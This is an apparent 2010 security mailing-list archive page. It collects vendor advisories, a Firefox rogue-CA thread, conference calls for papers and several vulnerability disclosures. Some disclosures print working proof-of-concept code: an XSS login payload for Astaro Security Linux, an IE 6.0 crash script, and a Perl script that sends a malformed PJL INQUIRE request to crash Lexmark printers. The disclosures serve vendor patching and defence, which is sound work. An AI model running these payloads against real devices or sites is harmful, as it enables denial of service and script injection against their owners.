2010-03-23 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-064

Application:SAP GUI 
Versions Affected:  SAP GUI (SAP GUI 7.1)
Vendor URL: http://SAP.com
Bugs:   Insecure method. Code Execution.
Exploits:   YES
Reported:   16.10.2009
Vendor response:27.10.2009
Date of Public Advisory:23.03.2010
Author: Alexey Sintsov
from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)
Description
***

Insecure method was founded in SAPBExCommonResources (class BExGlobal) activeX 
control component which is a part of SAP GUI.


Details
***
can be found inhttp://dsecrg.com/pages/vul/show.php?id=164

Fix Information
***
All patches are available since December via note 1407285

References
**
http://dsecrg.com/pages/vul/show.php?id=164
https://service.sap.com/sap/support/notes/1407285.




About
*

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com












Polyakov Alexandr. PCI QSA.
Head of security audit department
Head of Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  
www.dsec.ru
www.dsecrg.com
www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---  



Vulnerability Astaro Security Linux v5

2010-03-23 Thread Mehdi Mahdjoub - Sysdream IT Security Services
Program  : Astaro Security Linux v5
PoC  : XSS
Homepage : http://www.astaro.com/
Found by : Vincent Hautot
Contact  : v.hautot () sysdream com

//- Application description

Astaro Security Linux is a complete network security solution that
protects organizations against a wide range of threats to security
and productivity.


//- Description of vulnerability

This Xss was found on index.fpl page in the login form. Usig this flaw
it is possible to execute Javascript code.
Posting using multipart/form-data does not work ; use this data instead:

username...@fucking.mail&password=DTC&SID=>">alert("XSS !!!")
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0


//- Credits

http://www.sysdream.com/article.php?story_id=326§ion_id=78




IE 6.0 - Local Crash Exploit

2010-03-23 Thread info
###
# Securitylab.ir
###
Vul:




function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}


.!.

###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand 
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###


[SECURITY] [DSA 2021-1] New spamass-milter packages fix remote command execution

2010-03-23 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2021-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
March 22, 2010http://www.debian.org/security/faq
- 

Package: spamass-milter
Vulnerability  : missing input sanitization
Problem-Type   : remote
Debian-specific: no
CVE Id(s)  : none assigned yet
Debian Bug : 573228

It was discovered a missing input sanitization in spamass-milter, a milter
used to filter mail through spamassassin.
This allows a remote attacker to inject and execute arbitrary shell commands.

For the stable distribution (lenny), this problem has been fixed in
version 0.3.1-8+lenny1.

For the testing (squeeze) and unstable (sid) distribution this problem
has been fixed in version 0.3.1-9.

We recommend that you upgrade your spamass-milter package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1.orig.tar.gz
Size/MD5 checksum:   141144 ca6bf6a9c88db74a6bfea41f499c0ba6
  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1.dsc
Size/MD5 checksum: 1050 bb733b6a573d78be8a64002dbc592d44
  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1.diff.gz
Size/MD5 checksum:35298 c67ac575ec83da156f19d90a21c400e2

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_alpha.deb
Size/MD5 checksum:54606 a623cc750ad2dbeabb4ec9cc238bc40b

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_amd64.deb
Size/MD5 checksum:52752 8f67c0d4ebeb820a0a80b7c8a20a1761

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_arm.deb
Size/MD5 checksum:51254 87c4345b656711abf391b2c1620f0fa7

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_armel.deb
Size/MD5 checksum:47902 98855e92d23f6f2665f000a88a163dba

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_hppa.deb
Size/MD5 checksum:55546 6c97177505594b5389fdfe30cd293d80

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_i386.deb
Size/MD5 checksum:50980 109a06776578187d95ae70c3734e6b6d

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_ia64.deb
Size/MD5 checksum:59414 c816e86e810a4d611636bfec6a9df1cc

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_mipsel.deb
Size/MD5 checksum:51306 7204015ca8e050ccf6ea81626e215dbf

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_powerpc.deb
Size/MD5 checksum:55604 039127c2ba41f85b8c5a9c2c0889014b

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_s390.deb
Size/MD5 checksum:51450 f324ff3a60af459f5d15b8efc9e6e891

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_sparc.deb
Size/MD5 checksum:50052 1ca672e1eeb9a58376c09c61d4f00977


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAkunThoACgkQNxpp46476apx4gCfV3CGgKbrNHIpZs7Ib4

Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread Mike Duncan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Good question. Confirmed on Linux version as well (Mozilla/5.0 (X11; U;
Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6). More
information about the rogue-CA can be found here:
http://www.phreedom.org/research/rogue-ca/.

# openssl x509 -in MD5CollisionsInc.pem -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 66 (0x42)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global
eBusiness CA-1
Validity
Not Before: Jul 31 00:00:01 2004 GMT
Not After : Sep  2 00:00:01 2004 GMT
Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4:
a4:37:ee:0e:19:68:59:d1:b3:03:99:51:d6:16:9a:
5e:37:6b:15:e0:0e:4b:f5:84:64:f8:a3:db:41:6f:
35:d5:9b:15:1f:db:c4:38:52:70:81:97:5e:8f:a0:
b5:f7:7e:39:f0:32:ac:1e:ad:44:d2:b3:fa:48:c3:
ce:91:9b:ec:f4:9c:7c:e1:5a:f5:c8:37:6b:9a:83:
de:e7:ca:20:97:31:42:73:15:91:68:f4:88:af:f9:
28:28:c5:e9:0f:73:b0:17:4b:13:4c:99:75:d0:44:
e6:7e:08:6c:1a:f2:4f:1b:41
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Non Repudiation, Certificate Sign,
CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
A7:04:60:1F:AB:72:43:08:C5:7F:08:90:55:56:1C:D6:CE:E6:38:EB
X509v3 Authority Key Identifier:

keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6C

Netscape Comment:
3
Signature Algorithm: md5WithRSAEncryption
a7:21:02:8d:d1:0e:a2:80:77:25:fd:43:60:15:8f:ec:ef:90:
47:d4:84:42:15:26:11:1c:cd:c2:3c:10:29:a9:b6:df:ab:57:
75:91:da:e5:2b:b3:90:45:1c:30:63:56:3f:8a:d9:50:fa:ed:
58:6c:c0:65:ac:66:57:de:1c:c6:76:3b:f5:00:0e:8e:45:ce:
7f:4c:90:ec:2b:c6:cd:b3:b4:8f:62:d0:fe:b7:c5:26:72:44:
ed:f6:98:5b:ae:cb:d1:95:f5:da:08:be:68:46:b1:75:c8:ec:
1d:8f:1e:7a:94:f1:aa:53:78:a2:45:ae:54:ea:d1:9e:74:c8:
76:67



Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center


On 03/19/2010 04:22 PM, Francis Litterio wrote:
> In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption 
> ->
> View Certificates -> Authorities and scroll down to the entry for "Equifax
> Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc
> (http://www.phreedom.org/md5)" grouped with the other Equifax certs.
> 
> Yes, it's expired, so it poses no real threat, but why is the Mozilla Project
> shipping Firefox with that cert?  It just causes FUD.
> --
> Fran
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkunqlwACgkQnvIkv6fg9hZ9xgCeN2pHJd7cR/K0XoLAI4MKSR7P
6TsAn2gJ5czYDikEK25OcVsZngS/lGIN
=xb7R
-END PGP SIGNATURE-


REMINDER: Month of PHP Security 2010 - CALL FOR PAPERS - Only 3 weeks left

2010-03-23 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Month of PHP Security 2010 - CALL FOR PAPERS
- 

Three years ago, in March 2007, the Hardened-PHP project had organized
the Month of PHP Bugs. During one month more than 40 vulnerabilities in
the PHP interpreter were disclosed in order to improve the overall
security of PHP. Now, three years later, SektionEins GmbH  will
continue in the same spirit and organize the Month of PHP Security.

The intention of the Month of PHP Security is to gather the best
research and articles about PHP security topics from the security
community and share them with the rest of the world. This time the goal
is not only to improve the security of PHP itself and applications
directly by fixing security bugs, but also to help PHP developers
around the world to write better and more secure PHP applications.

The Month of PHP Security will be held in May 2010 by SektionEins
GmbH. During the month of May all qualifying entries will be published
at http://php-security.org day by day.


CFP Committee
- -
The CFP committee for the Month of PHP Security consists of

1) Johann-Peter Hartmann
2) Stefan Esser
3) Fukami
4) Ben Fuhrmannek

The CFP committee will review all submissions and select the list of
articles that will be published on http://php-security.org


Accepted Topics/Articles
- 
* New vulnerability in PHP [1]
  (not simple safe_mode, open_basedir bypass vulnerabilities)
* New vulnerability in PHP related software [1]
  (popular 3rd party PHP extensions/patches)
* Explain a single topic of PHP application security in detail
  (such as guidelines on how to store passwords)
* Explain a complicated vulnerability in/attack against a PHP
  widespread application [1]
* Explain a complicated topic of attacking PHP (e.g. explain how to
  exploit heap overflows in PHP's heap implementation)
* Explain how to attack encrypted PHP applications
* Release of a new open source PHP security tool
* Other topics related to PHP or PHP application security

[1] Articles about new vulnerabilities should mention possible
fixes or mitigations.


Responsible Disclosure
- --
In case of submitted vulnerabilities SektionEins GmbH will contact
the security team of the software vendor after the submission deadline
and share the vulnerability information with them. Along with the
vulnerability information SektionEins will provide the name of the
submitting party in order to give proper credits.


Prizes
- --
At the end of May the CFP committee will review the published
material and determine the best entries. Selected winners will
get the following prizes.

   1.   1000 EUR + Syscan Ticket + CodeScan PHP License

   2.   750 EUR + Syscan Ticket

   3.   500 EUR + Syscan Ticket

   4.   250 EUR + Syscan Ticket

   5.-6.CodeScan PHP License
   
   7.-16.   Amazon Coupon of 65 USD/50 EUR

SektionEins reserves the right to disqualify any submitted entry.
While employees of SektionEins can and will submit entries for
the Month of PHP Security they are excluded from receiving prizes.

The 1000 EUR cash prize and the Syscan tickets were generously
sponsored by Syscan. CodeScan PHP Licenses were sponsored by
CodeScan Limited. All other cash and non-cash prizes are sponsored
by SektionEins.

The winners of the Syscan tickets can choose one of the four
Syscan 2010 conferences to go to. Syscan Tickets include free
admission to the conference, speaker's dinner and speaker party.
Hotel and travelcosts are NOT included.

Please note that non-cash prizes cannot be changed into cash prizes.


Submission
- --
Submissions should be sent to c...@php-security.org and consist of the
following information:

1) Name and contact information (e-mail, postal address)
2) Employer and/or affiliations
3) Article about one of the allowed topics (at least 1000 words)
4) Optionally additional material like slides, whitepaper in PDF format

All submissions must be in English. The preferred delivery format is
plain text or HTML, but PDF is also accepted. Please pack all the
required items (pictures, text, ...) in a ZIP archive and submit this
ZIP archive by email.

Deadline for submissions is April 11, 2010.


Additional Information
- --
After submission SektionEins GmbH will acknowledge submissions with
a signed email. If you do not receive such an email within one week
after submission, then please contact us at c...@php-security.org
again.

By submitting your article you are granting SektionEins GmbH the rights
to reproduce, distribute, advertise and show your article including but
not limited to http://php-security.org, printed and/or electronic
advertisements, and all other media. However you are still allowed to
publish your own work in whatever way you want.


Thanks
- --
We would like to thank Syscan and Coseinc for generously offering
1000 EUR cash prize and four tickets to Syscan

[ MDVSA-2010:064 ] libpng

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:064
 http://www.mandriva.com/security/
 ___

 Package : libpng
 Date: March 23, 2010
 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in libpng:
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 e0f5c5c179b1224d99f6b16b718069b1  
2009.0/i586/libpng3-1.2.31-2.2mdv2009.0.i586.rpm
 5e5e6ec06e5d5997d82b1780c6e364e1  
2009.0/i586/libpng-devel-1.2.31-2.2mdv2009.0.i586.rpm
 48c2108e471923710e8ac01d7984df3a  
2009.0/i586/libpng-source-1.2.31-2.2mdv2009.0.i586.rpm
 24e60615f07e3310091b96db44821b55  
2009.0/i586/libpng-static-devel-1.2.31-2.2mdv2009.0.i586.rpm 
 148ad37542ef79c0ed97be519be0478d  
2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 0a76c1bbd16c3ff1e23027aeba6dbb70  
2009.0/x86_64/lib64png3-1.2.31-2.2mdv2009.0.x86_64.rpm
 8e01630ee7eb85327dc226632b535ffd  
2009.0/x86_64/lib64png-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 ed2d30ab62de27e52052fc2bd5958540  
2009.0/x86_64/lib64png-static-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 363e0b340727539dab6765b89660fb43  
2009.0/x86_64/libpng-source-1.2.31-2.2mdv2009.0.x86_64.rpm 
 148ad37542ef79c0ed97be519be0478d  
2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 eb835d104959137d6ca68071e8f55fc6  
2009.1/i586/libpng3-1.2.35-1.1mdv2009.1.i586.rpm
 c0154024cdcfa2d9fb221e2f4483546c  
2009.1/i586/libpng-devel-1.2.35-1.1mdv2009.1.i586.rpm
 22ec75a046bd10bfa69afa223e651357  
2009.1/i586/libpng-source-1.2.35-1.1mdv2009.1.i586.rpm
 2ddcfacf2b6dfa6bf873ffb49bbec43e  
2009.1/i586/libpng-static-devel-1.2.35-1.1mdv2009.1.i586.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  
2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 c9eec8bdd1b1a2aea33a9e5f8dfdc05e  
2009.1/x86_64/lib64png3-1.2.35-1.1mdv2009.1.x86_64.rpm
 36436b03497287eefe7011cfc4b69ab5  
2009.1/x86_64/lib64png-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 810be607e4dcc0c1e6157dd0281b3122  
2009.1/x86_64/lib64png-static-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 948e22de64093275c10dbd781cde02ed  
2009.1/x86_64/libpng-source-1.2.35-1.1mdv2009.1.x86_64.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  
2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 50a03f5191cc9383c09ef152fa6ebb8c  
2010.0/i586/libpng3-1.2.40-1.1mdv2010.0.i586.rpm
 6a528114a5d5cf86c684a179f5ee36b8  
2010.0/i586/libpng-devel-1.2.40-1.1mdv2010.0.i586.rpm
 9a1154491d80af5ced9a02e37947bf2c  
2010.0/i586/libpng-source-1.2.40-1.1mdv2010.0.i586.rpm
 fb0671ad70f8202f32c7566d08070a8c  
2010.0/i586/libpng-static-devel-1.2.40-1.1mdv2010.0.i586.rpm 
 5911cb03cac15875905c17214463ab65  
2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 08e10e44a82ca8df8c6586bf07d3b6ce  
2010.0/x86_64/lib64png3-1.2.40-1.1mdv2010.0.x86_64.rpm
 224425aa77a35bd3233c89613562fe7e  
2010.0/x86_64/lib64png-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 2682dae8ecdb43af20aadea093d3f03d  
2010.0/x86_64/lib64png-static-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 be6b483916a098489e41d13bf2f98d63  
2010.0/x86_64/libpng-source-1.2.40-1.1mdv2010.0.x86_64.rpm 
 5911cb03cac15875905c17214463ab65  
2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Enterprise Server 5:
 cb7196e7825b553e2414b76e236abf36  mes5/i586/libpng3-1.2.31-2.2mdvmes5.i586.rpm
 909211c1ac708b89b790e75261ac27b4  
mes5/i586/libpng-devel-1.2.31-2.2mdvmes5.i586.rpm
 5216e2e783fee0043ccf34c84db096fd  
mes5/i586/libpng-source-1.2.31-2.2mdvmes5.i586.rpm
 321d36768502ddfb1b90086b6204a670  
mes5/i586/libpng-static-devel-1.2.31-2.2mdvmes5.i586.rpm 
 b2e5c72d1cc33ec0e53b36a590cafa35  mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 457da1eac0895ee795e2076d46e723d6  
mes5/x86_64/lib64png3-1.2.31-2.2mdvmes5.x86_64.rpm
 80a132428cc6638972263f7f92fef9da  
mes5/x86_64/lib64png-dev

Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread adam
If you check further into that certificates configuration, you'll see that it's 
explicitly disabled, so that if it is encountered, it won't be accepted.

Firefox ships with that certificate, so that it can be stopped from using it.


CFP - GameSec 2010 - Conference on Decision and Game Theory for Security

2010-03-23 Thread Albert Levi

CALL FOR PAPERS

GameSec 2010 - Conference on Decision and Game Theory for Security
22-23 November 2010, Berlin, Germany

www.gamesec-conf.org

***
Important Dates

Submission deadline: 15 May 2010
Acceptance date: 23 August 2010
Camera-ready due: 15 September 2010

***
Industry Gold Sponsor: Deutsche Telekom Laboratories
Industry Silver Sponsor: Frauenhofer Heinrich Hertz Institute

Technical co-sponsors:
IEEE Control System Society
Internatational Society of Dynamic Games

***
GameSec 2010, the inaugural Conference on Decision and Game Theory for 
Security

will take place on the campus of Technical University Berlin, Germany, on
November 22-23, 2010.

Securing complex and networked systems and managing associated risks become
increasingly important as they play an indispensible role in modern life 
at the
turn of the information age. Concurrently, security of ubiquitous 
communication,
data, and computing pose novel research challenges. Security is a 
multi-faceted

problem due to the complexity of underlying hardware, software, and network
inter- dependencies as well as human and social factors. It involves 
decision
making in multiple levels and multiple time scales, given the limited 
resources

available to both malicious attackers and administrators defending networked
systems.

GameSec conference aims to bring together researchers who aim to establish a
theoretical foundation for making resource allocation decisions that balance
available capabilities and perceived security risks in a principled 
manner. The
conference focuses analytical models based on game, information, 
communication,

optimization, decision, and control theories that are applied to diverse
security topics. At the same time, the connection between theoretical 
models and
real world security problems are emphasized to establish the important 
feedback

loop between theory and practice. Observing the scarcity of venues for
researchers who try to develop a deeper theoretical understanding of the
underlying incentive and resource allocation issues in security, we 
believe that

GameSec will fill an important void and serve as a distinguished forum of
highest standards for years to come.

Topics of interest include (but are not limited to):
* Security games
* Security and risk management
* Mechanism design and incentives
* Decentralized security algorithms
* Security of networked systems
* Security of Web-based services
* Security of social networks
* Intrusion and anomaly detection
* Resource allocation for security
* Optimized response to malware
* Identity management
* Privacy and security
* Reputation and trust
* Information security and watermarking
* Physical layer security in wireless networks
* Information theoretic aspects of security
* Adversarial machine learning
* Distributed learning for security
* Cross-layer security
* Usability and security
* Human behavior and security
* Dynamic control of security systems
* Organizational aspects of risk management
* Cooperation and competition in security
* and more...

***
Submission instructions will be available on the conference website. 
Prospective

authors are encouraged to submit a PDF version of their full papers in the
announced format and in a font no smaller than 10-points. The initial 
submissions

are limited to 12 single-column pages to decrease the workload of volunteer
reviewers. The camera-ready version of accepted papers is limited to 20
single-column pages. The conference language is English.

The conference proceedings will be published by Springer in Lecture Notes
in Computer Science (LNCS). The proceedings will also be made available 
online

by Springer in full-text electronic form via Springerlink.

***
Steering Board

Tansu Alpcan (TU-Berlin)
Nick Bambos (Stanford Univ.)
Tamer Başar (Univ. of Illinois)
Anthony Ephremides (Univ. of Maryland)
Jean-Pierre Hubaux (EPFL)

***
2010 Organizers

General Chair:
Tansu Alpcan (TU-Berlin)

TPC Co-Chairs:
- John Baras (Univ Maryland)
- Levente Buttyan (Budapest Univ.)

Publicity Co-Chairs:
- Zhu Han (Univ. of Houston)
- Albert Levi (Sabanci Univ.)

Publication Chair:
Holger Boche (TU-Berlin)

Finance and Registration Chair:
Slawomir Stanczak (TU-Berlin)

Local Chair:
Jean-Pierre Seifert (TU-Berlin)

***
Technical Program Committee

* Eitan Altman (INRIA, France)
* Sonja Buchegger (KTH, Sweden)
* Mario Cagalj (Univ. of Split, Croatia)
* Srdjan Capkun (ETH Zurich, Switzerland)
* Lin Chen (Univ. of Paris-Sud 11, France)
* John Chuang (UC Berkeley, USA)
* Sajal K. Das (Univ. Texas at A., USA)
* Merouane Debbah (Supelec, France)
* Mark Felegyhazi (ICSI -Berkeley, USA)
* Jens Grossklags (Princeton Univ., USA)
* Are Hjorungnes (Univ. of Oslo, Norway)
* Eduard A. Jorswieck (Tech. Univ. Dresden, Germany)
* Iordanis Koutsopoulos (Univ. of Thessaly, Greece)
* Jean Leneutre (Telecom ParisTech, France)
* Xiang-Yang Li (Illinois Inst. of Tech., USA)
* Li (Erran) Li (Bell Labs., USA)
* M. Hossein Manshaei (EPFL, Switzerland)
* Piet

{PRL} Lexmark Multiple Laser Printer Remote Stack Overflow

2010-03-23 Thread Francis Provencher
#

Application:   Lexmark Multiple Laser Printer Remote Stack Overflow

Platforms:   Lexmark Multiple Laser printer

Exploitation:   Remote Exploitable

CVE Number:   CVE-2010-0619

Discover Date:   2010-01-06

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com

#

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#

=
1) Introduction
=

Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.

(Wikipedia)

#


2) Report Timeline


2010-01-06  Vendor Contacted
2010-01-09  Vendor Response
2010-01-09  Vendor request a PoC
2010-01-10  PoC is sent to the vendor
2010-01-12  Vendor confirme they received PoC
2010-01-13  Vendor confirm the vulnerability
2010-03-22  Public release of this advisory

#

==
3) Technical details
==

Multiple Lexmark Laser Printers contain remote stack overflow
vulnerabilities in their PJL processing functionality. These
vulnerabilities could lead to remote code execution on the printer
without authentication. Device freezes when a specialy PLJ request is
sent to the daemon with an invalid argument on PJL INQUIRE command.

#

=
4) Product affected
=

The list is too long, you can found information on the Lexmark web site;

http://support.lexmark.com/alerts


#

=
5) The Code
=


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC
#
# This PoC will completly DoS the printer and all is services, Use it
at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);


$sock or die "no socket :$!";
send($sock, "\033%-1234...@pjl INQUIRE
\r\n",0);



close $sock;




#
(PRL-2010-01)


[ MDVSA-2010:063 ] libpng

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:063
 http://www.mandriva.com/security/
 ___

 Package : libpng
 Date: March 22, 2010
 Affected: 2008.0, Corporate 4.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in libpng:
 
 libpng before 1.2.37 does not properly parse 1-bit interlaced images
 with width values that are not divisible by 8, which causes libpng
 to include uninitialized bits in certain rows of a PNG file and
 might allow remote attackers to read portions of sensitive memory
 via out-of-bounds pixels in the file (CVE-2009-2042).
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2042
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 a490385a7af091254460923d5b370281  
2008.0/i586/libpng3-1.2.22-0.4mdv2008.0.i586.rpm
 0a24bbf70a2d0acfe67872e0c9d8f709  
2008.0/i586/libpng-devel-1.2.22-0.4mdv2008.0.i586.rpm
 4606a9e929c6051e122b70ebe2e7bad4  
2008.0/i586/libpng-source-1.2.22-0.4mdv2008.0.i586.rpm
 694d03d2e8d3bcd07fc0684fd8a6b0c9  
2008.0/i586/libpng-static-devel-1.2.22-0.4mdv2008.0.i586.rpm 
 da310f9645a322af4d2a97b9cf4592eb  
2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 4502fd5d882a47d409bfd0e0bc154c88  
2008.0/x86_64/lib64png3-1.2.22-0.4mdv2008.0.x86_64.rpm
 91b539a7a3a87d57c1ee1e33921aa787  
2008.0/x86_64/lib64png-devel-1.2.22-0.4mdv2008.0.x86_64.rpm
 f0e202692b44e5ebd09168e307a1ad7b  
2008.0/x86_64/lib64png-static-devel-1.2.22-0.4mdv2008.0.x86_64.rpm
 a5c685aa7aac15155af58211a576e08c  
2008.0/x86_64/libpng-source-1.2.22-0.4mdv2008.0.x86_64.rpm 
 da310f9645a322af4d2a97b9cf4592eb  
2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm

 Corporate 4.0:
 e224d113e77e285d85ff11c55dae9e50  
corporate/4.0/i586/libpng3-1.2.8-1.7.20060mlcs4.i586.rpm
 c0d62f11277442b0d7a909d0c1c53249  
corporate/4.0/i586/libpng3-devel-1.2.8-1.7.20060mlcs4.i586.rpm
